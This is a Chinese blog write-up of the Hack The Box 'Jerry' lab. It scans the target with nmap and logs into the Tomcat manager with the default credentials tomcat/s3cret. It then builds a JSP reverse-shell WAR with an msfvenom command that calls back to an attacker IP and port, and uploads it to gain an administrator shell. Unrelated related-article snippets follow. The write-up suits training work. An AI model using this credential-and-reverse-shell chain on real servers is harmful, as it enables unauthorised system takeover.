HackTheBox::Jerry

于 2022-10-12 09:37:56 发布
阅读量189 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127276360
版权

0x00 信息收集

nmap -Pn -sV -p- -T 4 10.10.10.95

PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

8080端口是tomcat默认的界面,通常尝试账号密码爆破

使用默认口令tomcat/s3cret成功登录manager界面

进入后台后,可以发现上传点

0x01 漏洞利用

利用msfvenom生成jsp格式的shell,并上传war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > shell.war

可以在后台中看到shell的路径

访问http://10.10.10.95/shell,成功得到shell,而且是管理员权限。

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jerry:JiraGitFlow 助手
06-23
██╗███████╗██████╗ ██████╗ ██╗ ██╗ ██║██╔════╝██╔══██╗██╔══██╗╚██╗ ██... Your friendly helper to the world of gitflow on jira! 免责声明:
内网渗透笔记——:)一个笑脸
wang_zui_zui的博客
03-01 5152
打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.http://www.vulnhub.co
tomcat 7 任意文件上传漏洞(信息搜集与漏洞探测)
m0_67391377的博客
08-25 986
(6)抓包发现存在404报错,一个get方法,以及tomcat版本。(7)上网查tomcat漏洞,在7版本的时候存在以下漏洞。1)使用nmap -sP扫描c段网络存活主机。通过对页面浏览,得知该网站存在一个信息泄露。2)使用nmap -sS扫描端口开放。(1)查询攻击机kali的IP地址。(4)在kali中进行服务扫描验证。(5)使用nmap -O 查看系统。(2)识别存活主机,发现攻击目标。(8)对网站进行修改put测试。(10)再上传jsp一句话木马。(3)在浏览器中打开该ip。(9)访问上传的文件。
解决Apache Tomcat版本泄露,Apache-Coyote/1.1自定义
顺其自然~专栏
09-13 4369
同时,为了能让我们编写的 servlet 能够得到ServletRequest,tomcat 使用了 facade 模式,将比较底层、低级的 Request 包装成为 ServletRequest(这一过程通常发生在Wrapper容器一级),这也是为很多人津津乐道的 tomcat 对设计模式的一个巧妙的运用,具体过程将会在以后讨论。coyote本质上是为tomcat的容器提供了对底层socket连接数据的封装,以Request类的形式,让容器能够访问到底层的数据。coyote 是 tomcat 的。
解决tomcat版本泄露,Apache-Coyote/1.1自定义
cxws110的博客
03-14 7188
在tomcat中找到server.xml文件,找到如下位置: <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" URIEncoding="utf-8" /> 在后面加上server属性: &lt...
tom_jerry:练习laravel
03-21
练习Laravel。
Jerry:生成并注入JavaScript画布模拟
05-18
使用纯JavaScript在HTML画布上绘制的一些很酷的模拟。 您可以在查看它们的运行情况。
Android-OkHttp-Jerry:OkHttp实用程序
05-02
Jerry只是Android中OKHTTP的实用工具,它具有FLUENT APIS 。 从ok-http 3开始,square已更改了许多API,因此我仍在开发新版本的Jerry。 我待会儿给一个样品。 用法 这很简单! 我也在我的书房里给了一个枫糖。 ...
tom-and-jerry:好游戏
03-19
汤姆和杰瑞 好游戏
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 5583
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
靶机渗透练习55-digitalworld.local:MERCY v2
hirak0的博客
04-19 6575
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ Description MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. 😃 MERCY is a name-play
Java修改服务器(tomcat)响应头 Server:Apache-Coyote/1.1
热门推荐
时间无言的博客
01-19 1万+
Server:Apache-Coyote/1.1 :很多人有说有漏洞,是否有没研究过,只知道Apache-Coyote是tomcat处理socket链接信息,包装request、response等底层信息的一套机制,Server:Apache-Coyote/1.1是泄露了当前容器的类型所以可以选择如下修改               connectionTimeout="20000"       
Spring Boot 内置Tomcat——集成JSP解决方案
无限迭代中......
11-03 872
解决方案 一、创建webapp目录 在src/main下创建webapp目录,用于存放jsp文件。这就是一个普通的目录,无需执行Mark Directory As 二、创建JSP 1、指定web资源目录 在spring boot工程中若要创建jsp文件,一般是需要在src/main下创建webapp目录,然后在该目录下创建jsp文件。但通过Alt + Insert发现没有创建jsp文件的选项。此时,需要打开Project Structrue窗口,将webapp目录指定为web资源目录,然后才可
解决版本泄露,修改服务器Apache-Coyote/1.1标识为自定义内容
RayChiu757374816的博客
01-11 6578
找到server.xml配置文件,路径如下:CATALINA_HOME/conf/server.xml 找到内容: connectionTimeout="20000" redirectPort="8443"/> 修改为: connectionTimeout="20000"
python:排名排序
最新发布
06-12
在 Python 中,可以使用 `sorted()` 函数对列表进行排序。如果要按照列表中元素的大小进行排序,可以直接调用 `sorted()` 函数;如果要按照列表中元素的某个属性进行排序,则需要使用 `key` 参数指定排序的依据。 下面是一个示例代码,演示了如何对一个列表按照元素大小进行排序: ```python mylist = [3, 5, 1, 2, 4] sorted_list = sorted(mylist) print(sorted_list) ``` 输出结果: ``` [1, 2, 3, 4, 5] ``` 如果要按照元素的某个属性进行排序,例如对一个学生列表按照成绩进行排序,可以使用 `key` 参数指定排序的依据。下面是一个示例代码: ```python class Student: def __init__(self, name, score): self.name = name self.score = score students = [ Student('Tom', 80), Student('Jerry', 90), Student('Alice', 85), ] sorted_students = sorted(students, key=lambda x: x.score, reverse=True) for student in sorted_students: print(student.name, student.score) ``` 输出结果: ``` Jerry 90 Alice 85 Tom 80 ``` 在这个例子中,我们定义了一个 `Student` 类表示学生,每个学生有姓名和成绩两个属性。我们创建了一个学生列表 `students`,然后调用 `sorted()` 函数对其进行排序,按照学生成绩从高到低排序。在 `sorted()` 函数中,我们使用了 `key` 参数指定排序的依据,即按照学生的成绩进行排序。由于我们希望按照成绩从高到低排序,因此设置了 `reverse=True`。最后,我们遍历排序后的学生列表,并输出每个学生的姓名和成绩。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值